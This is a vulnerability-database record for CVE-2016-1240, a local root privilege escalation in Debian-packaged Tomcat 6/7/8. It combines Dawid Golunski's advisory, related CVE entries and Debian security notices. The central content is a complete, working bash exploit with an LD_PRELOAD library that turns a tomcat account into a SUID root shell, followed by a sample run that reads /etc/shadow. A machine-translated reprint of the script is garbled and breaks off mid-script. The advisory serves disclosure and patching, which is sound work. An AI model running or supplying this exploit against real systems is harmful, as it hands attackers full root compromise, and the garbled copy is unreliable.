{"lastseen": "2016-10-04T09:29:12", "osvdbidlist": [], "references": [], "description": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation. CVE-2016-1240. Local exploit for Linux platform", "reporter": "Dawid Golunski", "published": "2016-10-03T00:00:00", "type": "exploitdb", "title": "Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation", "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2016-10-04T09:29:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-1240"]}, {"type": "openvas", "idList": ["OPENVAS:703670", "OPENVAS:1361412562310703670", "OPENVAS:703669", "OPENVAS:1361412562310703669", "OPENVAS:1361412562310842892"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3670-1:7364A", "DEBIAN:DLA-622-1:61A2B", "DEBIAN:DLA-623-1:9251E", "DEBIAN:DSA-3669-1:CFB19"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2017-0455.NASL", "UBUNTU_USN-3081-1.NASL", "GENTOO_GLSA-201705-09.NASL", "DEBIAN_DLA-623.NASL", "DEBIAN_DSA-3670.NASL", "DEBIAN_DLA-622.NASL", "DEBIAN_DSA-3669.NASL", "REDHAT-RHSA-2017-0456.NASL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201679941"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1B5B3B594F0BEB22BF053920EF4C7307"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138940"]}, {"type": "zdt", "idList": ["1337DAY-ID-25101"]}, {"type": "seebug", "idList": ["SSV:92455"]}, {"type": "ubuntu", "idList": ["USN-3081-1"]}, {"type": "redhat", "idList": ["RHSA-2017:0457", "RHSA-2017:0455", "RHSA-2017:0456"]}, {"type": "gentoo", "idList": ["GLSA-201705-09"]}], "modified": "2016-10-04T09:29:12", "rev": 2}, "vulnersScore": 2.6}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1240"], "modified": "2016-10-03T00:00:00", "id": "EDB-ID:40450", "href": "https://www.exploit-db.com/exploits/40450/", "viewCount": 307, "sourceData": "=============================================\r

- Discovered by: Dawid Golunski\r

- http://legalhackers.com\r

- dawid (at) legalhackers.com\r

\r

- CVE-2016-1240\r

- Release date: 30.09.2016\r

- Revision: 1\r

- Severity: High\r

=============================================\r

\r

\r

I. VULNERABILITY\r

-------------------------\r

\r

Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation\r

\r

Affected debian packages:\r

\r

Tomcat 8 <= 8.0.36-2 \r

Tomcat 7 <= 7.0.70-2 \r

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1\r

\r

Ubuntu systems are also affected. See section VII. for details.\r

Other systems using the affected debian packages may also be affected.\r

\r

\r

II. BACKGROUND\r

-------------------------\r

\r

\"The Apache Tomcat\u0102\u0082\u00c2\u017d software is an open source implementation of the \r

Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \r

technologies. The Java Servlet, JavaServer Pages, Java Expression Language \r

and Java WebSocket specifications are developed under the Java Community \r

Process.\r

\r

The Apache Tomcat software is developed in an open and participatory \r

environment and released under the Apache License version 2. \r

The Apache Tomcat project is intended to be a collaboration of the \r

best-of-breed developers from around the world.\r

\r

Apache Tomcat software powers numerous large-scale, mission-critical web \r

applications across a diverse range of industries and organizations. \r

Some of these users and their stories are listed on the PoweredBy wiki page.\r

\"\r

\r

http://tomcat.apache.org/\r

\r

\r

III. INTRODUCTION\r

-------------------------\r

\r

Tomcat (6, 7, 8) packages provided by default repositories on Debian-based \r

distributions (including Debian, Ubuntu etc.) provide a vulnerable\r

tomcat init script that allows local attackers who have already gained access \r

to the tomcat account (for example, by exploiting an RCE vulnerability\r

in a java web application hosted on Tomcat, uploading a webshell etc.) to\r

escalate their privileges from tomcat user to root and fully compromise the \r

target system.\r

\r

IV. DESCRIPTION\r

-------------------------\r

\r

The vulnerability is located in the tomcat init script provided by affected\r

packages, normally installed at /etc/init.d/tomcatN. \r

\r

The script for tomcat7 contains the following lines:\r

\r

-----[tomcat7]----\r

\r

# Run the catalina.sh script as a daemon\r

set +e\r

touch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r

chown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r

\r

-------[eof]------\r

\r

Local attackers who have gained access to the server in the context of the\r

tomcat user (for example, through a vulnerability in a web application) would \r

be able to replace the log file with a symlink to an arbitrary system file \r

and escalate their privileges to root once Tomcat init script (running as root)\r

re-opens the catalina.out file after a service restart, reboot etc.\r

\r

As attackers would already have a tomcat account at the time of exploitation,\r

they could also kill the tomcat processes to introduce the need for a restart.\r

\r

\r

V. PROOF OF CONCEPT EXPLOIT\r

-------------------------\r

\r

------[ tomcat-rootprivesc-deb.sh ]------\r

\r

#!/bin/bash\r

#\r

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r

#\r

# CVE-2016-1240\r

#\r

# Discovered and coded by:\r

#\r

# Dawid Golunski\r

# http://legalhackers.com\r

#\r

# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \r

# Debian-based distros including Debian, Ubuntu etc.\r

# It allows attackers with a tomcat shell (e.g. obtained remotely through a \r

# vulnerable java webapp, or locally via weak permissions on webapps in the \r

# Tomcat webroot directories etc.) to escalate their privileges to root.\r

#\r

# Usage:\r

# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]\r

#\r

# The exploit can used in two ways:\r

#\r

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly\r

# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \r

# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up\r

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)\r

#\r

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \r

# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \r

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \r

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can\r

# then add arbitrary commands to the file which will be executed with root privileges by \r

# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \r

# Ubuntu/Debian Tomcat installations).\r

#\r

# See full advisory for details at:\r

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r

#\r

# Disclaimer:\r

# For testing purposes only. Do no harm.\r

#\r

\r

BACKDOORSH=\"/bin/bash\"\r

BACKDOORPATH=\"/tmp/tomcatrootsh\"\r

PRIVESCLIB=\"/tmp/privesclib.so\"\r

PRIVESCSRC=\"/tmp/privesclib.c\"\r

SUIDBIN=\"/usr/bin/sudo\"\r

\r

function cleanexit {\r

\t# Cleanup \r

\techo -e \"\

[+] Cleaning up...\"\r

\trm -f $PRIVESCSRC\r

\trm -f $PRIVESCLIB\r

\trm -f $TOMCATLOG\r

\ttouch $TOMCATLOG\r

\tif [ -f /etc/ld.so.preload ]; then\r

\t\techo -n > /etc/ld.so.preload 2>/dev/null\r

\tfi\r

\techo -e \"\

[+] Job done. Exiting with code $1 \

\"\r

\texit $1\r

}\r

\r

function ctrl_c() {\r

echo -e \"\

[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r

\tcleanexit 0\r

}\r

\r

#intro \r

echo -e \"\\033[94m \

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\

CVE-2016-1240\

\"\r

echo -e \"Discovered and coded by: \

\

Dawid Golunski \

http://legalhackers.com \\033[0m\"\r

\r

# Args\r

if [ $# -lt 1 ]; then\r

\techo -e \"\

[!] Exploit usage: \

\

$0 path_to_catalina.out [-deferred]\

\"\r

\texit 3\r

fi\r

if [ \"$2\" = \"-deferred\" ]; then\r

\tmode=\"deferred\"\r

else\r

\tmode=\"active\"\r

fi\r

\r

# Priv check\r

echo -e \"\

[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \

`id`\"\r

id | grep -q tomcat\r

if [ $? -ne 0 ]; then\r

\techo -e \"\

[!] You need to execute the exploit as tomcat user! Exiting.\

\"\r

\texit 3\r

fi\r

\r

# Set target paths\r

TOMCATLOG=\"$1\"\r

if [ ! -f $TOMCATLOG ]; then\r

\techo -e \"\

[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\

\"\r

\texit 3\r

fi\r

echo -e \"\

[+] Target Tomcat log file set to $TOMCATLOG\"\r

\r

# [ Deferred exploitation ]\r

\r

# Symlink the log file to /etc/default/locale file which gets executed daily on default\r

# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r

# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r

# restarted and file owner gets changed.\r

if [ \"$mode\" = \"deferred\" ]; then\r

\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r

\tif [ $? -ne 0 ]; then\r

\t\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r

\t\tcleanexit 3\r

\tfi\r

\techo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"\r

\techo -e \"\

[+] The current owner of the file is: \

`ls -l /etc/default/locale`\"\r

\techo -ne \"\

[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"\r

\techo -ne \"\

you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r

\techo -ne \"\

at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\

\

\"\r

\texit 0\r

fi\r

\r

# [ Active exploitation ]\r

\r

trap ctrl_c INT\r

# Compile privesc preload library\r

echo -e \"\

[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r

cat <<_solibeof_>$PRIVESCSRC\r

#define _GNU_SOURCE\r

#include <stdio.h>\r

#include <sys/stat.h>\r

#include <unistd.h>\r

#include <dlfcn.h>\r

uid_t geteuid(void) {\r

\tstatic uid_t (*old_geteuid)();\r

\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r

\tif ( old_geteuid() == 0 ) {\r

\t\tchown(\"$BACKDOORPATH\", 0, 0);\r

\t\tchmod(\"$BACKDOORPATH\", 04777);\r

\t\tunlink(\"/etc/ld.so.preload\");\r

\t}\r

\treturn old_geteuid();\r

}\r

_solibeof_\r

gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r

if [ $? -ne 0 ]; then\r

\techo -e \"\

[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r

\tcleanexit 2;\r

fi\r

\r

# Prepare backdoor shell\r

cp $BACKDOORSH $BACKDOORPATH\r

echo -e \"\

[+] Backdoor/low-priv shell installed at: \

`ls -l $BACKDOORPATH`\"\r

\r

# Safety check\r

if [ -f /etc/ld.so.preload ]; then\r

\techo -e \"\

[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r

\tcleanexit 2\r

fi\r

\r

# Symlink the log file to ld.so.preload\r

rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r

if [ $? -ne 0 ]; then\r

\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r

\tcleanexit 3\r

fi\r

echo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"\r

\r

# Wait for Tomcat to re-open the logs\r

echo -ne \"\

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r

echo -e \"\

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r

while :; do \r

\tsleep 0.1\r

\tif [ -f /etc/ld.so.preload ]; then\r

\t\techo $PRIVESCLIB > /etc/ld.so.preload\r

\t\tbreak;\r

\tfi\r

done\r

\r

# /etc/ld.so.preload file should be owned by tomcat user at this point\r

# Inject the privesc.so shared library to escalate privileges\r

echo $PRIVESCLIB > /etc/ld.so.preload\r

echo -e \"\

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \

`ls -l /etc/ld.so.preload`\"\r

echo -e \"\

[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r

echo -e \"\

[+] The /etc/ld.so.preload file now contains: \

`cat /etc/ld.so.preload`\"\r

\r

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r

echo -e \"\

[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r

sudo --help 2>/dev/null >/dev/null\r

\r

# Check for the rootshell\r

ls -l $BACKDOORPATH | grep rws | grep -q root\r

if [ $? -eq 0 ]; then \r

\techo -e \"\

[+] Rootshell got assigned root SUID perms at: \

`ls -l $BACKDOORPATH`\"\r

\techo -e \"\

\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r

else\r

\techo -e \"\

[!] Failed to get root\"\r

\tcleanexit 2\r

fi\r

\r

# Execute the rootshell\r

echo -e \"\

[+] Executing the rootshell $BACKDOORPATH now! \

\"\r

$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r

$BACKDOORPATH -p\r

\r

# Job done.\r

cleanexit 0\r

\r

--------------[ EOF ]--------------------\r

\r

\r

\r

Example exploit run:\r

~~~~~~~~~~~~~~\r

\r

tomcat7@ubuntu:/tmp$ id\r

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r

\r

tomcat7@ubuntu:/tmp$ lsb_release -a\r

No LSB modules are available.\r

Distributor ID:\tUbuntu\r

Description:\tUbuntu 16.04 LTS\r

Release:\t16.04\r

Codename:\txenial\r

\r

tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat\r

ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r

ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r

ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r

\r

tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \r

\r

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r

CVE-2016-1240\r

\r

Discovered and coded by: \r

\r

Dawid Golunski \r

http://legalhackers.com \r

\r

[+] Starting the exploit in [active] mode with the following privileges: \r

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r

\r

[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r

\r

[+] Compiling the privesc shared library (/tmp/privesclib.c)\r

\r

[+] Backdoor/low-priv shell installed at: \r

-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r

\r

[+] Symlink created at: \r

lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r

\r

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r

\r

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \r

-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r

\r

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r

\r

[+] The /etc/ld.so.preload file now contains: \r

/tmp/privesclib.so\r

\r

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r

\r

[+] Rootshell got assigned root SUID perms at: \r

-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r

\r

Please tell me you're seeing this too ;) \r

\r

[+] Executing the rootshell /tmp/tomcatrootsh now! \r

\r

tomcatrootsh-4.3# id\r

uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r

tomcatrootsh-4.3# whoami\r

root\r

tomcatrootsh-4.3# head -n3 /etc/shadow\r

root:$6$oaf[cut]:16912:0:99999:7:::\r

daemon:*:16912:0:99999:7:::\r

bin:*:16912:0:99999:7:::\r

tomcatrootsh-4.3# exit\r

exit\r

\r

[+] Cleaning up...\r

\r

[+] Job done. Exiting with code 0 \r

\r

\r

\r

VI. BUSINESS IMPACT\r

-------------------------\r

\r

Local attackers who have gained access to tomcat user account (for example \r

remotely via a vulnerable web application, or locally via weak webroot perms),\r

could escalate their privileges to root and fully compromise the affected system.\r

\r

\r

VII. SYSTEMS AFFECTED\r

-------------------------\r

\r

The following Debian package versions are affected:\r

\r

Tomcat 8 <= 8.0.36-2\r

Tomcat 7 <= 7.0.70-2\r

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1\r

\r

A more detailed lists of affected packages can be found at:\r

\r

Debian:\r

https://security-tracker.debian.org/tracker/CVE-2016-1240\r

\r

Ubuntu:\r

http://www.ubuntu.com/usn/usn-3081-1/\r

\r

Other systmes that use Tomcat packages provided by Debian may also be affected.\r

\r

\r

VIII. SOLUTION\r

-------------------------\r

\r

Debian Security Team was contacted and has fixed affected upstream packages.\r

Update to the latest tomcat packages provided by your distribution.\r

\r

IX. REFERENCES\r

-------------------------\r

\r

http://legalhackers.com\r

\r

http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r

\r

The exploit's sourcecode\r

http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r

\r

CVE-2016-1240\r

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r

\r

Ubuntu Security Notice USN-3081-1:\r

http://www.ubuntu.com/usn/usn-3081-1/\r

\r

Debian Security Advisory DSA-3669-1 (tomcat7):\r

https://lists.debian.org/debian-security-announce/2016/msg00249.html\r

https://www.debian.org/security/2016/dsa-3669\r

\r

Debian Security Advisory DSA-3670-1 (tomcat8):\r

https://www.debian.org/security/2016/dsa-3670\r

\r

https://security-tracker.debian.org/tracker/CVE-2016-1240\r

\r

\r

X. CREDITS\r

-------------------------\r

\r

The vulnerability has been discovered by Dawid Golunski\r

dawid (at) legalhackers (dot) com\r

http://legalhackers.com\r

\r

XI. REVISION HISTORY\r

-------------------------\r

\r

30.09.2016 - Advisory released\r

\r

XII. LEGAL NOTICES\r

-------------------------\r

\r

The information contained within this advisory is supplied \"as-is\" with\r

no warranties or guarantees of fitness of use or otherwise. I accept no\r

responsibility for any damage caused by the use or misuse of this information.", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "sourceHref": "https://www.exploit-db.com/download/40450/"}

{"cve": [{"lastseen": "2020-09-21T14:24:30", "description": "The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-03T15:59:00", "title": "CVE-2016-1240", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1240"], "modified": "2018-10-09T19:59:00", "cpe": ["cpe:/a:apache:tomcat:8.0", "cpe:/a:apache:tomcat:7.0", "cpe:/a:apache:tomcat:6.0"], "id": "CVE-2016-1240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1240", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:tomcat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2020-08-12T00:52:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "- -------------------------------------------------------------------------

Debian Security Advisory DSA-3669-1 security@debian.org

https://www.debian.org/security/ Moritz Muehlenhoff

September 15, 2016 https://www.debian.org/security/faq

- -------------------------------------------------------------------------



Package : tomcat7

CVE ID : CVE-2016-1240



Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.



For the stable distribution (jessie), this problem has been fixed in

version 7.0.56-3+deb8u4.



We recommend that you upgrade your tomcat7 packages.



Further information about Debian Security Advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://www.debian.org/security/



Mailing list: debian-security-announce@lists.debian.org

", "edition": 8, "modified": "2016-09-15T17:27:26", "published": "2016-09-15T17:27:26", "id": "DEBIAN:DSA-3669-1:CFB19", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00248.html", "title": "[SECURITY] [DSA 3669-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "Package : tomcat7

Version : 7.0.28-4+deb7u6

CVE ID : CVE-2016-1240





Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 7 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat7 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt



In addition this security update also fixes Debian bug #821391. File

ownership in /etc/tomcat7 will no longer be unconditionally overridden

on upgrade. As another precaution the file permissions of Debian

specific configuration files in /etc/tomcat7 were changed to 640 to

disallow world readable access.



For Debian 7 "Wheezy", these problems have been fixed in version

7.0.28-4+deb7u6.



We recommend that you upgrade your tomcat7 packages.



Further information about Debian LTS security advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://wiki.debian.org/LTS

", "edition": 3, "modified": "2016-09-15T15:08:18", "published": "2016-09-15T15:08:18", "id": "DEBIAN:DLA-623-1:9251E", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00016.html", "title": "[SECURITY] [DLA 623-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "Package : tomcat6

Version : 6.0.45+dfsg-1~deb7u2

CVE ID : CVE-2016-1240







Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 6 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat6 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es

calation-Exploit.txt



For Debian 7 "Wheezy", these problems have been fixed in version

6.0.45+dfsg-1~deb7u2.



We recommend that you upgrade your tomcat6 packages.



Further information about Debian LTS security advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://wiki.debian.org/LTS

", "edition": 3, "modified": "2016-09-15T14:47:02", "published": "2016-09-15T14:47:02", "id": "DEBIAN:DLA-622-1:61A2B", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00015.html", "title": "[SECURITY] [DLA 622-1] tomcat6 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:47:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1240"], "description": "- -------------------------------------------------------------------------

Debian Security Advisory DSA-3670-1 security@debian.org

https://www.debian.org/security/ Moritz Muehlenhoff

September 15, 2016 https://www.debian.org/security/faq

- -------------------------------------------------------------------------



Package : tomcat8

CVE ID : CVE-2016-1240



Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.



For the stable distribution (jessie), this problem has been fixed in

version 8.0.14-1+deb8u3.



For the unstable distribution (sid), this problem will be fixed soon.



We recommend that you upgrade your tomcat8 packages.



Further information about Debian Security Advisories, how to apply

these updates to your system and frequently asked questions can be

found at: https://www.debian.org/security/



Mailing list: debian-security-announce@lists.debian.org

", "edition": 8, "modified": "2016-09-15T17:28:15", "published": "2016-09-15T17:28:15", "id": "DEBIAN:DSA-3670-1:7364A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00249.html", "title": "[SECURITY] [DSA 3670-1] tomcat8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2016-10-29T18:03:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-1240"], "edition": 1, "description": "Will you celebrate the National Day, the Tomcat to 1 0 September 1, exposed the local to mention the right Vulnerability, CVE-2 0 1 6-1 2 4 0 to. Just a Tomcat user with low privileges, the attacker could use the vulnerability to get to the system ROOT privileges. And the vulnerability of the use the difficulty is not large, the affected users need special attention.

Tomcat is running in Apache on the application server, support for running Servlet/JSP application container--can be the Tomcat as an Apache extension, in fact, Tomcat can also be independent of Apache running.

! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 8 1 6 4 2 1 3 2 3 0. png? www. myhack58. com)

Vulnerability ID:

CVE-2 0 1 6-1 2 4 0

Affect range:

Tomcat 8

Tomcat 7

Tomcat 6

Affected systems include Debian, Ubuntu, other use the corresponding deb package system may also be affected.

Repair solutions:

The Debian security team has fixed the affected packages; the update to the system to provide the latest version of the Tomcat package to.

Vulnerability overview:

Debian system on Linux administrators typically use apt-get for package management, the CVE-2 0 1 6-1 2 4 0 This is a vulnerability which is the problem in Tomcat deb package,make the deb package to install Tomcat program automatically as administrator to install a startup script:/etc/init. d/tocat* use the script, can lead to an attacker through a low-permissions of the Tomcat user to get system root permission!

# Run the catalina.sh script as a daemon

set +e

touch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina. out

chown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina. out

A local attacker, as the tomcat user, for example, through web application vulnerabilities to the catalina. out modified to point to any file system links, once the Tomcat init script with ROOT permissions running in the service after the restart again open the catalina. out file, the attacker can obtain ROOT privileges.

Vulnerability PoC of:

#!/ bin/bash

#

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

#

# CVE-2 0 1 6-1 2 4 0

#

# Discovered and coded by:

#

# Dawid Golunski

# http://legalhackers.com

#

# This exploit targets the Tomcat (versions 6, 7 and 8) packaging on

# Debian-based distros including Debian, Ubuntu etc.

# It allows attackers with a tomcat shell (e.g. obtained remotely through a

# vulnerable java webapp, or locally via weak permissions on webapps in the

# Tomcat webroot directories etc.) to escalate their privileges to root.

#

# Usage:

# ./ tomcat-rootprivesc-deb.sh path_to_catalina. out [-deferred]

#

# The exploit can used in two ways:

#

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly

# gains/executes a rootshell via ld. so. preload as soon as the Tomcat service is restarted.

# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

#

# -deferred (the requires the-deferred switch on argv[2]) - this mode symlinks the logfile to

# /etc/default/locale and exits. It removes the need for the Trojan to run in a loop waiting.

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can

# then add arbitrary commands to the file which will be executed with root privileges by

# the /etc/cron. daily/tomcatN logrotation cronjob (run daily around 6:25am on default

# Ubuntu/Debian Tomcat installations).

#

# See full advisory for details at:

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

#

# Disclaimer:

# For testing purposes only. Do no harm.

#

BACKDOORSH=\"/bin/bash\"

BACKDOORPATH=\"/tmp/tomcatrootsh\"

PRIVESCLIB=\"/tmp/privesclib. so\"

PRIVESCSRC=\"/tmp/privesclib. c\"

SUIDBIN=\"/usr/bin/sudo\"

function cleanexit {

# Cleanup

echo-e \"\

[+] Cleaning up...\"

rm-f $PRIVESCSRC

rm-f $PRIVESCLIB

rm-f $TOMCATLOG

touch $TOMCATLOG

if [ -f /etc/ld. so. preload ]; then

echo-n > /etc/ld. so. preload 2>/dev/null

fi

echo-e \"\

[+] Job done. Exiting with code $1 \

\"

exit $1

}

function ctrl_c() {

echo-e \"\

[+] Active exploitation aborted. Remember you can use-deferred switch for deferred exploitation.\"

cleanexit 0

}

#intro

echo-e \"\\0 3 3[94m \

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\

